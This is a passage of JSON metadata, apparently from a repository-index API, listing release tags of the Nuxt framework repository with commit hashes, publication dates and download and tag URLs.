26c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github